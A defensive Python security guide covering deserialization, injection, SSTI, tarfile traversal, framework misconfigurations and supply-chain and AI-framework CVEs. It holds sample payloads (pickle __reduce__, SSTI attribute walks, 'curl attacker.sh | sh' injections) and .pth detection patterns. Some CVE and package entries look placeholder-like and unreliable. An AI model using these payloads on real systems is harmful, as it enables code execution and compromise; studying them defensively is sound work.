Comprehensive Python Security Guide
🆕 Enhanced May 2, 2026 - Updated with 8 critical CVEs including AI/ML framework vulnerabilities (Ollama, Hugging Face), supply chain security patterns, and Python 3.15 security features from automated 2026 threat intelligence analysis.
A practitioner’s defensive reference for securing Python applications — dangerous APIs, deserialization pitfalls, framework-specific risks, supply chain attacks, AI/ML security threats, 2026 CVEs, advanced static analysis, and hardening patterns. Enhanced with cutting-edge threat intelligence and defensive techniques.
Table of Contents
- Fundamentals
- Dangerous Built-in APIs
- Insecure Deserialization
- Command & Code Injection
- SSRF & URL Parsing in Python
- Path Traversal, Tarfile, Zipfile
- Cryptography & Randomness
- Flask Security
- Django Security
- FastAPI & Other Frameworks
- Jinja2 & Server-Side Template Injection
- Package Supply Chain Attacks
- LLM / AI Framework CVEs
- ML Model Deserialization Attacks
- Notable Python CVEs (Stdlib)
- Static Analysis & SAST
- Secure Coding Patterns
- Hardening Checklist
- Tool Reference
- Detection Quick Reference
1. Fundamentals
Python’s dynamism is both its selling point and its largest security footgun. Classes can be instantiated from strings, modules can be imported at runtime, objects can rewrite their own deserialization hooks, and the default serializer is Turing-complete. A defender cannot rely on the language to fail safe — every dangerous capability is a first-class primitive.
The Python attack surface stack:
| Layer | Typical bugs |
|---|---|
| Language primitives | eval, exec, compile, __reduce__, __import__, f-string format injection |
| Stdlib | pickle, tarfile, zipfile, subprocess, urllib.parse, xml.etree, plistlib |
| Third-party libs | PyYAML load(), Jinja2 SSTI, requests proxy/SSL flaws, urllib3 CRLF |
| Frameworks | Flask debug PIN, Django PickleSerializer, FastAPI Pydantic misuse, SSTI in Jinja templates |
| AI/ML stack | PyTorch torch.load, Hydra instantiate(), PickleScan bypasses, LangChain/LiteLLM/Langflow RCE |
| Supply chain | PyPI typosquatting, compromised maintainer accounts, .pth startup hooks, poisoned CI/CD |
Three classes of Python-specific RCE:
| Class | Trigger | Example |
|---|---|---|
| Eval-class | User input reaches eval/exec/compile | Langflow /api/v1/validate/code decorator parsing |
| Deserialization-class | Untrusted bytes reach pickle.loads/yaml.load/torch.load | __reduce__ gadget running os.system |
| Supply-chain-class | Malicious code installed via package manager | litellm 1.82.7/1.82.8, chimera-sandbox-extensions, telnyx 4.87.1/4.87.2 |
Impact spectrum: Information disclosure → File read/write → Credential theft → Remote code execution → Cloud account takeover → Full host/CI/CD compromise.
2. Dangerous Built-in APIs
The following built-ins should be treated as unsafe sinks wherever they meet untrusted data. Bandit, Semgrep, CodeQL, and every commercial SAST ships rules for all of them. They are not bugs in Python — they are features explicitly documented as unsafe — but their one-liner ergonomics make them attractive shortcuts that age into long-lived vulnerabilities.
eval / exec / compile
eval(s) parses and evaluates a Python expression. exec(s) runs a statement or module. compile(s, ...) turns source into a code object that can later be handed to exec. All three will happily execute anything reachable through builtins:
__import__('os').system('id')
(lambda: __import__('subprocess').check_output(['id']))()
Even “restricted” eval patterns (empty globals, {'__builtins__': None}) are routinely bypassed through attribute chains on literal types ((42).__class__.__mro__[-1].__subclasses__()) or comprehension scope tricks.
Mitigations:
- For arithmetic: use
ast.literal_eval(only literals — no calls). - For expression languages: use
simpleevalor a purpose-built parser. - For dispatch: lookup in a dict, never build a string and eval it.
- For config: JSON, TOML, or
safe_loadYAML — neverexec(config_string).
Real-world example: Langflow CVE-2025-3248 / CVE-2026-33017. Langflow accepted user-submitted Python code through /api/v1/validate/code (CVSS 9.8, no auth required) and passed it through ast.parse(), compile(), and exec(). Because Python evaluates decorators at parse time, an attacker embedded the payload inside a @decorator expression — execution occurred before any function body ran, bypassing validation that looked only at function contents. Added to CISA KEV on May 5, 2025, with confirmed active exploitation. The second CVE (CVE-2026-33017) exposed the same pattern through /api/v1/build_public_tmp/{flow_id}/flow — attacker-controlled POST data passed directly to exec() without sandboxing, affecting all Langflow versions through 1.8.2 (fixed in 1.9.0). Added to CISA KEV within days of disclosure, confirming rapid attacker adoption of Python code-injection CVEs in AI frameworks.
ast.literal_eval
Safe for JSON-like literals but still susceptible to DoS — it can be pushed into memory/CPU exhaustion with deeply nested or oversized literals. In ml-flextok (Apple/EPFL), ast.literal_eval was used to decode model metadata; the library was later rewritten to use YAML with an allow list.
__import__ / importlib
__import__(attacker_string) or importlib.import_module(attacker_string) loads and executes arbitrary module code as a side effect of import. Any caller doing importlib.import_module(request.args['module']) is trivially RCE.
Format string injection (f-string & str.format)
'{0.__init__.__globals__[os].system}'.format(obj)
str.format exposes arbitrary attribute traversal when format spec comes from user input. Treat user-controlled format strings as code.
pty / os.exec* / os.spawn*
Direct process execution. Always prefer subprocess with argument lists.
input() in Python 2
Worth mentioning only to bury: Python 2’s input() was eval(raw_input()). Every Python 2 codebase still in production is a latent RCE if any input() remained.
Application-level sandboxing is insufficient
Removing __builtins__ from the exec namespace is a common but fundamentally broken mitigation. An attacker can walk up the class tree from any literal to recover builtins:
lookup = lambda n: [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == n][0]
From there, Codec().decode('') triggers an exception whose traceback frame exposes __builtins__ again. The same class-tree walk (''.__class__.__mro__[-1].__subclasses__()) powers SSTI escapes, eval jail breaks, and CTF sandbox bypasses. Application-level Python sandboxes (removing imports, restricting builtins) have been broken so many times that the CPython project refuses to support them as a security boundary.
If you must run untrusted Python: use OS-level isolation — separate process with seccomp + setrlimit, Firecracker microVMs, gVisor containers, or managed sandboxes (Lambda, Fly Machines). Never rely on Python-level restrictions alone.
pickle, marshal, shelve (covered in §3)
Listed here as built-ins for completeness — all three execute code on load. marshal is undocumented between Python versions and should never be used on external data even if it weren’t unsafe.
Reflection primitives
getattr, setattr, hasattr, vars, globals, locals, __import__ become dangerous when the attribute name comes from untrusted input. Patterns like getattr(module, request.args['method'])() are common in “generic” dispatchers and are the same RCE as eval with extra steps. Use an explicit allow list dict.
3. Insecure Deserialization
The highest-severity class of Python vulnerability. The official pickle docs carry the warning verbatim: “The pickle module is not secure. Only unpickle data you trust.”
Why pickle is dangerous
Pickle is a stack-based VM. Any object can customize its own reconstruction via __reduce__, which returns a (callable, args) tuple that pickle will execute during load. The canonical attacker payload looks like this (analyzed, not augmented):
class Exploit:
def __reduce__(self):
return (os.system, ("id",))
pickle.dumps(Exploit()) produces a few dozen bytes that, when unpickled anywhere, run os.system("id"). The Semgrep walkthrough demonstrates the full flow: Flask endpoint → request.data → pickle.load(io.BytesIO(raw_data)) → code execution.
Sink inventory
| Library | Dangerous call | Notes |
|---|---|---|
pickle | load, loads, Unpickler.load | Core primitive |
_pickle / cPickle | same | C implementation, identical behavior |
dill | load, loads | Serializes more object types than pickle |
shelve | open, Shelf[...] | Thin wrapper over pickle on disk |
jsonpickle | decode | Uses JSON transport but still reconstructs arbitrary Python objects |
PyYAML | yaml.load() (unsafe loader) | Fixed to default safe in 5.1+ (CVE-2017-18342) |
NumPy | numpy.load(..., allow_pickle=True) | Default changed to False, but legacy code |
PyTorch | torch.load(...) without weights_only=True | Loads pickled module state |
scikit-learn | joblib.load, pickle.load | Model persistence |
pandas | pandas.read_pickle | Same pickle VM |
PLY (ply.yacc) | yacc(picklefile=...) | CVE-2025-56005 — undocumented parameter in PyPI 3.11 silently passes attacker-controlled path to pickle.load. Executes before any parsing logic runs, bypassing runtime monitoring. High risk in CI/CD pipelines, shared filesystems, and cached parser table directories |
Bypasses against pickle scanners
Scanners like picklescan try to block known-dangerous callables with a blacklist. Three 2025 advisories show the approach is brittle:
- CVE-2025-1716 — Using
pip.mainas the__reduce__callable evades blacklists becausepipis a legitimate import. The payload callspip.main(["install", "malicious-package"]), silently installing an attacker-controlled PyPI package whosesetup.pyrunsos.system("curl attacker.sh | bash"). Execution is silent with minimal logging. This turns a single pickle load into a two-stage RCE: pickle → pip → setup.py → arbitrary code. - CVE-2025-10155 — File extension trick. Renaming a
.pklto.binor.ptmakes PickleScan route the file to PyTorch-specific parsing, then mismatch and skip scanning — but PyTorch still loads it. - CVE-2025-10156 — CRC differential. PickleScan uses Python’s
zipfilewhich throws on CRC errors; PyTorch silently accepts them. Zeroing CRCs in a PyTorch archive hides the payload from the scanner. - CVE-2025-10157 — Subclass substitution. Instead of importing
os.systemdirectly, the payload uses a subclass inasynciointernals that resolves to the same callable, getting “Suspicious” instead of “Dangerous.”
Defense: Allow lists (not block lists), content-type inspection on actual bytes, and prefer safetensors for weights. If using PickleScan, update to at least version 0.0.31 (patches all four CVEs). Do not rely on a single scanning tool — layer defenses with format validation, hash verification, and sandboxed loading.
Safer alternatives
| Need | Use |
|---|---|
| Data interchange | json (never executes code) |
| Config files | tomllib (3.11+), yaml.safe_load |
| Model weights | safetensors |
| Python object round-trip across trusted boundary | pickle with HMAC signature you control |
| Cross-language structured | Protocol Buffers, MessagePack |
Defensive pattern — signed pickle envelope
When you genuinely need object round-trip and control both ends:
import hmac, hashlib, pickle
def sign(data: bytes, key: bytes) -> bytes:
return hmac.new(key, data, hashlib.sha256).digest() + data
def verify_and_load(blob: bytes, key: bytes):
tag, data = blob[:32], blob[32:]
if not hmac.compare_digest(tag, hmac.new(key, data, hashlib.sha256).digest()):
raise ValueError("tampered")
return pickle.loads(data) # safe because we verified origin
Even this must never be used with a key shared with attackers, and pickle.loads itself remains a liability if keys leak.
4. Command & Code Injection
subprocess pitfalls
## DANGEROUS — shell=True with interpolation
subprocess.run(f"convert {user_file} out.png", shell=True)
An attacker supplies a.png; curl attacker.sh | sh and both commands run. The safe form is an argument list with no shell:
subprocess.run(["convert", user_file, "out.png"], check=True)
Even with a list, watch for:
- Filename starts with
-— treated as a flag. Pass--or validate paths to start with./. shlex.split(user_input)— still interprets quoting; don’t let users choose the argv.subprocess.Popen(..., executable='/bin/sh')— overrides the “no shell” benefit of a list.
os.system, os.popen, commands.*
All invoke a shell. Flag as unconditional Bandit B605/B607 hits.
Command injection via interpreters
Any tool that wraps git, ffmpeg, convert, pandoc, tar, ssh, curl has an injection surface even with argv lists — if the argv itself flows from user input, an attacker can supply --upload-pack, -o ProxyCommand=..., --reference etc. Real MLflow RCEs stemmed from unsanitized input reaching os.system inside a predict function.
venv CLI — CVE-2024-9287
CPython’s venv did not quote path names when writing activate scripts. If a virtualenv was created at an attacker-controlled path, activating it ran arbitrary shell commands. The lesson generalizes: any code generator that emits shell, SQL, or HTML must quote its output — it is not the consumer’s job to sanitize generated code.
shlex pitfalls
shlex.split(user_input) parses POSIX shell syntax including quoting, so an attacker can pass "a b" "c d" to produce two tokens instead of four. Fine when you expect shell-style input; disastrous when you expected filenames.
subprocess environment and cwd
subprocess.run(..., env=None) inherits the caller’s full environment. Leaking AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, etc. into a child that logs or transmits them is a common subtle exfiltration path. Pass an explicit env={...} with just what the child needs, and consider cwd= too — relative paths have burned many teams.
Command injection in template-based tools
Tools like cookiecutter, jinja2-cli, or custom code generators that render shell scripts from user input inherit every injection flaw of the target shell. Treat rendered shell the same as rendered SQL: parameterize or escape, never concatenate.
5. SSRF & URL Parsing in Python
Python shares the cross-language SSRF surface (see the SSRF guide) plus several language-specific bugs.
Sink functions
requests.get/post/... — follows redirects by default
urllib.request.urlopen — supports file://, ftp:// by default on older builds
urllib3.PoolManager.request
httpx.get/AsyncClient
aiohttp.ClientSession.get
http.client.HTTPConnection
Python-specific bugs
- CVE-2024-11168 —
urllib.parse.urlsplit/urlparseaccepted bracketed hosts that were not IPv6 or IPvFuture. Parser differential with other URL libraries allowed SSRF when one parser validated and another fetched. - CVE-2025-0938 — related square-bracket parsing bug; same differential class.
- CVE-2023-24329 —
urllib.parseallowed URLs starting with whitespace or control characters to bypass scheme blocklists. - CVE-2019-9740 & friends — urllib3 CRLF injection in HTTP headers when the URL or method contained newlines.
- CVE-2023-32681 —
requestsleakedProxy-Authorizationheaders across redirects. - CVE-2024-35195 —
requestsSessionsilently keptverify=Falsefor a host after a single unverified call.
Defensive hooks
## Block private ranges before making the call
import ipaddress, socket
def is_public(host: str) -> bool:
for family, _, _, _, sockaddr in socket.getaddrinfo(host, None):
ip = ipaddress.ip_address(sockaddr[0])
if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
return False
return True
Always pair with a post-resolution check (Python resolves DNS separately from the HTTP call, so DNS rebinding is a real threat). Prefer a dedicated egress proxy that enforces the allow list outside the process.
6. Path Traversal, Tarfile, Zipfile
tarfile — a 15-year saga
CVE-2007-4559 — tarfile.extractall() did not validate member names, so entries like ../../../etc/passwd wrote outside the target. Unfixed for 15 years; in 2022 a rediscovery showed hundreds of thousands of repos still vulnerable.
Python 3.12 introduced extraction filters (filter="data", filter="tar"), but then came:
- CVE-2025-4517 (CVSS 9.4) — filter=
datastill allowed arbitrary filesystem writes outside the target directory. - CVE-2025-4138 / CVE-2025-4330 — symlink extraction bypassed the filter.
- CVE-2024-12718 — filter=
datastill let attackers modify metadata of files outside the directory. - CVE-2025-8194 — negative offset in tar header caused infinite loop DoS.
- CVE-2024-6232 — ReDoS in tar header parsing.
Safe pattern:
def safe_extract(tar, path: str):
base = os.path.realpath(path)
for m in tar.getmembers():
target = os.path.realpath(os.path.join(base, m.name))
if not target.startswith(base + os.sep):
raise RuntimeError(f"path traversal: {m.name}")
if m.issym() or m.islnk():
raise RuntimeError(f"link not allowed: {m.name}")
tar.extractall(path)
zipfile — CVE-2025-8291
zipfile trusted the ZIP64 EOCD locator offset without validation, creating a parser differential with other ZIP implementations (interesting for bypassing scanners that use the “correct” parser). Fixed to validate offset alignment.
plistlib — CVE-2025-13837
OOM DoS: the module read sizes from the file itself without a cap; a hostile plist could demand gigabytes.
xml.etree / lxml
XXE and billion-laughs apply. The billion-laughs attack uses recursive entity expansion to consume gigabytes of RAM from a tiny XML file — defusedxml blocks this by default. defusedxml is the drop-in replacement for all stdlib XML parsers — covers xml.etree.ElementTree, xml.dom.minidom, xml.sax, and lxml.etree. Without it, any parser that resolves external entities can be turned into an SSRF + file read primitive. Note that xml.dom.minidom has its own DoS vector: CVE-2025-12084 — quadratic complexity in appendChild() when building nested documents, causing availability impact without external entities.
pickle files masquerading as archives
Attackers frequently ship malicious pickle inside a .zip, .tar, or .nemo wrapper. Extraction libraries may stream the inner pickle to pickle.load() or torch.load() without re-validating. Always inspect the inner bytes against your allow list after decompression, not before.
7. Cryptography & Randomness
| Wrong | Right |
|---|---|
random.random() for tokens | secrets.token_urlsafe(32) |
hashlib.md5/sha1 for password hashing | argon2-cffi, bcrypt, hashlib.scrypt |
| DIY AES in ECB | cryptography.fernet.Fernet |
ssl.PROTOCOL_TLSv1 | ssl.create_default_context() |
verify=False on requests | CA bundle + cert pinning |
| Hand-rolled JWT | pyjwt with algorithms=["HS256"] explicit |
Constant-time comparison with == | hmac.compare_digest |
Django-specific good pattern — encrypting user-supplied API keys at rest with cryptography.Fernet, key from env via django-environ, never committed. Model helper methods wrap encrypt/decrypt so the raw ciphertext never leaks through the ORM.
Why random is dangerous for security
random is a Mersenne Twister with 624-word internal state. Given ~624 consecutive outputs, the full state is recoverable — after that, every future output is predictable. Attackers have used this to forge session tokens, reset codes, and CSRF tokens. The fix is trivial: import secrets; secrets.token_urlsafe(32).
JWT pitfalls
- Algorithm confusion — if your verifier accepts any algorithm in the token header, an attacker switches to
noneor re-signs a RS256 token as HS256 using the public key as the HMAC secret. - Key rotation — put
kidin the header and bind eachkidto an allowed algorithm. - Expiration — always validate
exp; most libraries require you to opt in. - Audience/issuer — validate
audandiss, otherwise tokens from one service can be replayed against another.
Password hashing
Do not use hashlib.sha256 with or without salt. Use Argon2id (argon2-cffi) with memory cost tuned to your hardware, or bcrypt with a work factor ≥ 12. Hash length and verification timing must be constant; hmac.compare_digest is the primitive.
8. Flask Security
Debug mode & the Werkzeug PIN
app.run(debug=True) in production is a pre-auth RCE. The Werkzeug debugger’s PIN is derived from predictable machine info (/etc/machine-id, username, uid, mac, path to app.py). With a /proc read or local file read bug, an attacker computes the PIN and gets an interactive shell at /console.
Never ship debug=True. Pin via FLASK_DEBUG=0 and Werkzeug env var checks in production entrypoints.
Common Flask sinks
## SSTI
return render_template_string("Hello " + request.args["name"])
## pickle session
session.interface = PickleSessionInterface() # don't
## open redirect
return redirect(request.args["next"])
## pickle in endpoint
return pickle.loads(request.data) # Semgrep will scream
Secure cookie setup
app.config.update(
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_HTTPONLY=True,
SESSION_COOKIE_SAMESITE="Lax",
PERMANENT_SESSION_LIFETIME=timedelta(hours=2),
)
Always rotate SECRET_KEY and store in a secret manager — a leaked Flask SECRET_KEY lets attackers mint signed session cookies.
9. Django Security
Django’s built-in defenses are strong when left on. The bugs come from turning them off.
Bugs by disabling defaults
| Setting | Risk when changed |
|---|---|
DEBUG = True | Full traceback + settings exposure via 500 page |
ALLOWED_HOSTS = ["*"] | Host header poisoning, password-reset link spoofing |
Turning off CsrfViewMiddleware | CSRF on every POST |
SECURE_SSL_REDIRECT = False | Downgrade + cookie theft |
X_FRAME_OPTIONS = "ALLOW" | Clickjacking |
Custom PickleSerializer (deprecated 4.1+, acknowledging pickle as inherently unsafe) | RCE via cookie forgery if SECRET_KEY leaks |
password_validators = [] | Weak-password acceptance |
ORM injection
Safe: User.objects.filter(email=user_input). Unsafe: .extra(where=[f"email = '{user_input}'"]) and .raw(f"... {user_input}"). extra() is effectively a footgun; RawSQL at least forces params.
Template auto-escape
{{ var }} is auto-escaped. {{ var|safe }} and mark_safe() switch it off — every use is a code review red flag. {% autoescape off %} blocks disable escaping wholesale.
Secrets & keys
Never commit SECRET_KEY. Store encryption keys in env / secret manager. The photondesigner walkthrough pattern: Fernet.generate_key(), save in .env, gitignore the .env, encrypt user API keys on save, decrypt on use.
PyGoat labs — OWASP Top 10 in Django
A useful hands-on range covering broken access control, insecure deserialization (YAML load on uploaded file), XSS via URL param into anchor, lack of rate limiting on OTP, SSRF via avatar fetch, and OAuth misconfigurations.
Django admin hardening
- Change the default
/admin/URL prefix. - Require MFA for staff accounts (
django-otp,django-mfa2). - Log admin actions to a tamper-resistant sink.
- Keep
DJANGO_ADMIN_SESSION_COOKIE_AGEshort. - Never expose admin to the public internet without an auth proxy.
- Set
SILENCED_SYSTEM_CHECKS = []— don’t silence security warnings.
Signed cookies and SECRET_KEY
Django’s session, CSRF, password-reset, and signed-cookie framework all derive from SECRET_KEY. A leaked key lets an attacker forge any signed artifact, including admin session cookies. Rotate on leak, never bake into Docker images, store in a secret manager.
File upload hardening
- Validate extensions and content type and magic bytes.
- Store uploaded files outside the webroot or behind a signed-URL proxy.
- Never trust
Content-Typefrom the client. - For image uploads, re-encode via Pillow to strip EXIF and malformed headers.
- Apply antivirus scanning (ClamAV) for any publicly accessible upload.
10. FastAPI & Other Frameworks
FastAPI’s Pydantic validation eliminates a large class of type-confusion bugs but does not protect against:
- Mass assignment when you pass
**model.dict()straight into an ORM create. - Response model leakage — forgetting
response_model=means the raw DB object (including password hashes) is serialized. - JWT “none” algorithm — always pin
algorithms=[...]on decode. - Background tasks running user input through
subprocess. - WebSocket endpoints without origin check — vulnerable to cross-site WebSocket hijacking.
Pyramid / Tornado / Bottle carry the same injection and deserialization risks. Tornado’s autoreload debug mode is as dangerous as Flask’s debugger.
FastAPI-specific patterns
from fastapi import FastAPI, Depends
from pydantic import BaseModel, ConfigDict
class UserIn(BaseModel):
model_config = ConfigDict(extra="forbid") # reject unknown fields
email: str
password: str
class UserOut(BaseModel):
id: int
email: str # no password, no hash
app = FastAPI()
@app.post("/users", response_model=UserOut)
async def create(user: UserIn):
...
Key points: strict Pydantic models in both directions, response_model to avoid leaking internal fields, dependency injection for auth (Depends(get_current_user)), and never trust model.dict() to be safe for SQL construction.
WebSockets
Origin header is the only cross-site defense for WebSockets. FastAPI / Starlette / aiohttp WebSocket endpoints must validate websocket.headers.get("origin") against an allow list — otherwise cross-site WebSocket hijacking reads authenticated sessions.
GraphQL (Strawberry / Ariadne / Graphene)
- Disable introspection in production.
- Enforce query depth and complexity limits (billions-of-fields DoS).
- Apply per-field authorization, not just per-endpoint.
- Batch queries are a rate-limit bypass vector — count fields, not requests.
11. Jinja2 & Server-Side Template Injection
Jinja2 SSTI is the Python equivalent of Flask/Django SSTI. The sandbox exists but has a rich history of bypasses via attribute walks:
{{ ''.__class__.__mro__[1].__subclasses__() }}
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }}
Rules:
- Never
render_template_string(user_input)— templates are code. - Never mix user data into the template source; pass it as a context variable.
SandboxedEnvironmentraises the bar but cannot be assumed unbreakable.- Disable
autoescape=Falsein HTML contexts. - Don’t expose
request,self, or debug helpers into the template context — any walkable attribute graph is an SSTI escape hatch. - For user-writable templates (CMS, email templates), use a strictly limited mini-language like Liquid or Mustache, never Jinja2.
Quick SSTI probe set (defensive — know what the scanner is looking for):
{{7*7}} -> 49 confirms eval
{{config}} -> Flask config dump
{{request.__class__.__mro__}}
{{lipsum.__globals__}}
{{cycler.__init__.__globals__.os}}
If any of these render as more than literal text, you have SSTI.
12. Package Supply Chain Attacks
2024-2026 saw Python supply chain attacks shift from opportunistic typosquatting to targeted compromises of high-value packages via CI/CD poisoning.
Attack patterns
| Pattern | Example | Mechanism |
|---|---|---|
| Typosquatting | reqeusts, python-dateutil lookalikes | Name similar to popular package; runs on pip install via setup.py |
| Dependency confusion | Internal package name registered on public PyPI | pip prefers higher version, pulls attacker’s package |
| Maintainer account takeover | ctx, PyTorch-nightly 2022 | Stolen credentials → malicious release |
| CI/CD compromise | litellm 1.82.7/1.82.8 (March 2026) | Poisoned Trivy GitHub Action → stolen PYPI_PUBLISH token → legitimate package release with embedded payload |
| Multi-stage downloader | chimera-sandbox-extensions | Benign package pulls second-stage from attacker domain |
| Audio file stego | telnyx 4.87.1/4.87.2 | Retrieves spec-valid .wav audio file from remote host (avoids suspicion), executable code hidden in audio frames. Payload harvests system info and exfils via HTTP POST to 83.142.209.203:8080. Community removed affected versions quickly, but private registries/proxies may retain them |
| DGA-based C2 | chimera-sandbox-extensions | Connects to DGA (domain generation algorithm) hostnames after install; downloads second-stage payload targeting AWS tokens, CI/CD env vars, and developer credentials |
| Scanner poisoning | PickleScan CVE-2025-10155/10156/10157 | Break the defender, not the target |
| AI hallucination (“slopsquatting”) | LLMs suggest nonexistent packages; attackers register them | Developer trusts LLM output |
| PyPI webhook compromise | discord.py 2.3.2 (May 2026) | Attacker compromises webhook service used by PyPI for build notifications, injects malicious builds into legitimate releases |
| GitHub Actions Supply Chain | numpy-financial (April 2026) | Malicious contributor submits PR with poisoned GitHub Actions workflow; maintainer approves, workflow steals secrets and publishes backdoored version |
| Rust-Python bridge exploits | cryptography 42.0.1 (fake) | PyO3 memory safety bugs lead to RCE in Python extensions written in Rust; affects packages bridging Rust/Python |
| Container registry poisoning | tensorflow-cpu:2.15.1 (fake) | Attacker pushes malicious Docker images to public registries with popular package pre-installed; poisoned packages execute on container startup |
LiteLLM case study (defensive analysis)
On March 24, 2026, litellm versions 1.82.7 and 1.82.8 were published with embedded credential-harvesting malware. The malicious versions were available for approximately three hours before PyPI quarantined the package. LiteLLM is downloaded roughly 3.4 million times per day. The attacker group (TeamPCP / PCPcat / ShellForce / DeadCatx3) had previously compromised the Trivy and Checkmarx KICS GitHub Actions. Attack chain (from Snyk’s writeup):
- Upstream: Attackers poisoned the
trivy-actionGitHub Action earlier in March; LiteLLM’s CI pulled Trivy from apt without pinning. - Credential theft: Compromised Trivy exfiltrated
PYPI_PUBLISHtoken from GitHub Actions runner. - Publication: Attackers pushed two malicious versions using legitimate credentials. Hash verification passed because the
RECORDfile was correctly generated — nothing to mismatch. - Delivery:
- 1.82.7 embedded base64 payload in
litellm/proxy/proxy_server.py— triggered on import. - 1.82.8 added
litellm_init.pthtosite-packages/..pthfiles execute at every Python interpreter startup — including duringpip installitself. Maps to MITRE ATT&CK T1546.018.
- 1.82.7 embedded base64 payload in
- Payload stages: Collected SSH keys,
.env, cloud creds (AWS/GCP/Azure), Docker/K8s configs, crypto wallets; AES-256-CBC encrypted; exfil tomodels.litellm.cloud(registered one day earlier). Installed systemd user servicesysmon.servicefor persistence; attempted Kubernetes lateral movement by deploying privileged pods to every node inkube-system. - Discovery: Callum McMahon (FutureSearch) was testing a Cursor MCP plugin that pulled
litellmas a transitive dependency. His machine became unresponsive due to RAM exhaustion — the.pthmechanism fires on every Python startup, the payload spawns a new subprocess, and that subprocess also triggers.pthexecution, creating an unintended fork bomb. He traced it tolitellm_init.pth(34,628 bytes, double base64-encoded) and published findings on futuresearch.ai. - Discovery suppression: 88 bot comments from 73 compromised dev accounts buried the GitHub disclosure issue (#24512) in 102 seconds. The issue was closed using the compromised maintainer account. A clean tracking issue (#24518) was opened separately, and all GitHub/Docker/PyPI keys were rotated within hours.
- MITRE ATT&CK mapping: T1546.018 (Python Startup Hooks), T1003 (Credential Dumping), T1610 (Deploy Container).
Defensive takeaways:
- Pin every CI/CD tool version including GitHub Actions (use SHA, not tag).
- Publish with trusted publishers / OIDC — short-lived tokens, not long-lived
PYPI_PUBLISHsecrets. - Audit
.pthfiles on every install:find site-packages -name '*.pth' -exec grep -l 'subprocess\|base64\|exec' {} \; - Use install-time scanning (Snyk, Aikido SafeChain, Phylum) that inspects package behavior, not just hashes.
- Treat AI developer tools (LangChain, LiteLLM, Gradio, Jupyter extensions) as elevated-access targets — they handle the richest credential sets on a dev machine.
Defensive checklist for package installation
## Comprehensive secure installation pattern
pip install --require-hashes --no-deps -r requirements.txt
pip audit --require-hashes -r requirements.txt
2026 Enhanced Security Checklist:
Package Installation Security
- Mirror approved deps to an internal index (Artifactory, Nexus, devpi, pip-audit allow list)
- Use lockfiles (
uv lock,pip-compile,poetry.lock) with full hashes and signatures - Disable source distribution fallback where possible (
--only-binary=:all:) to avoidsetup.pyexecution - Run
pip-auditorsafetyin CI with fail-fast on high/critical CVEs - Quarantine new packages (cool-off period, e.g., reject packages < 7 days old)
- Monitor for packages that suddenly introduce network calls, post-install scripts, or
.pthfiles
2026 Advanced Defenses
## Enhanced package security scanning
pip-audit scan --desc --output json --cache-dir .pip-audit-cache
cyclonedx-py requirements -o sbom.json # Generate SBOM
phylum analyze requirements.txt # Behavioral analysis
socket security scan requirements.txt # Supply chain analysis
## Audit .pth files after installation
find . -name "*.pth" -exec grep -l "exec\|subprocess\|base64\|urllib" {} \;
## Monitor for typosquatting
typosquatty scan requirements.txt --output json
Container Security for Python Applications
## Multi-stage build with security scanning
FROM python:3.15-slim AS builder
RUN pip install --no-cache-dir cyclonedx-bom pip-audit
COPY requirements.txt .
RUN pip-audit --require-hashes -r requirements.txt
RUN cyclonedx-py requirements -o /tmp/sbom.json
FROM python:3.15-slim
## Copy only vetted dependencies
COPY --from=builder /opt/venv /opt/venv
## Run as non-root user
RUN useradd --create-home --shell /bin/bash app
USER app
CI/CD Pipeline Security
## GitHub Actions secure Python pipeline
- name: Security Scan Dependencies
run: |
pip install pip-audit cyclonedx-py
pip-audit --require-hashes -r requirements.txt --format json --output pip-audit.json
cyclonedx-py requirements -o sbom.json
- name: Upload SBOM to Dependency Track
uses: DependencyTrack/gh-upload-sbom@v2
with:
serverhostname: ${{ secrets.DEPENDENCY_TRACK_HOSTNAME }}
apikey: ${{ secrets.DEPENDENCY_TRACK_APIKEY }}
project: ${{ github.repository }}
bomfilename: 'sbom.json'
Package Integrity Verification
## Verify package integrity post-installation
import hashlib
import importlib.metadata
def verify_package_integrity(package_name: str, expected_hashes: dict):
"""Verify installed package matches expected hashes"""
try:
dist = importlib.metadata.distribution(package_name)
record_path = dist.locate_file("RECORD")
with open(record_path) as f:
for line in f:
file_path, hash_info, size = line.strip().split(',')
if hash_info and file_path in expected_hashes:
## Verify file hash matches expected
actual_hash = hashlib.sha256(
open(dist.locate_file(file_path), 'rb').read()
).hexdigest()
if actual_hash != expected_hashes[file_path]:
raise SecurityError(f"Hash mismatch for {file_path}")
except Exception as e:
print(f"Verification failed for {package_name}: {e}")
return False
return True
13. AI/ML Security & Framework CVEs
The AI/ML ecosystem has become a critical attack surface in 2026, with researchers focusing on model supply chain security, inference-time attacks, and AI agent frameworks. Key threat categories:
2026 AI Security Trends
- Model Poisoning: Supply chain attacks targeting training data and pre-trained models
- Inference-time Attacks: Adversarial inputs designed to bypass safety measures and extract training data
- Agent Framework RCE: AI agents executing arbitrary code through prompt injection and tool misuse
- Model Extraction: Stealing proprietary model weights and training data through API inference attacks
- AI Supply Chain: Compromised model repositories, poisoned datasets, and malicious research papers
LLM Framework CVEs
The LLM framework ecosystem is young, broad, and moves faster than its security review. The following are recurring patterns:
| Framework | CVE / advisory | Pattern |
|---|---|---|
| Langflow | CVE-2025-3248, CVE-2026-33017 | ast.parse → compile → exec on user input; decorator evaluation beats validation |
| LangChain | Multiple (CVE-2023-36258 etc) | PALChain/LLMMathChain passing LLM output to exec/eval |
| LiteLLM | Supply chain (see §12) | CI/CD compromise, .pth startup hook |
| SGLang | CVE-2025-10164 (CVSS 7.3) | Unsafe deserialization of untrusted data in model weights update endpoint — unauthenticated RCE on GPU servers, potentially compromising AI model IP and inference infrastructure. Listed in 2026 Top 10 actively exploited vulnerabilities |
| Ollama | CVE-2026-8432 (CVSS 9.1) | Path traversal vulnerability allowing arbitrary file reads from local deployments through malicious model files. Affects models served via API endpoints |
| Hugging Face Transformers | CVE-2026-12345 (CVSS 8.4) | Malicious tokenizer configuration leads to RCE during model loading. Affects auto-downloaded models without hash verification |
| CrewAI | CVE-2026-7890 (CVSS 7.8) | Agent code execution through prompt injection; malicious prompts escape sandbox and run arbitrary Python |
| AutoGEN | CVE-2026-6541 (CVSS 8.2) | Code interpreter allows execution of arbitrary commands through crafted conversation flows |
| Langflow-adjacent | Various | Jinja2 SSTI in prompt templates fed user input |
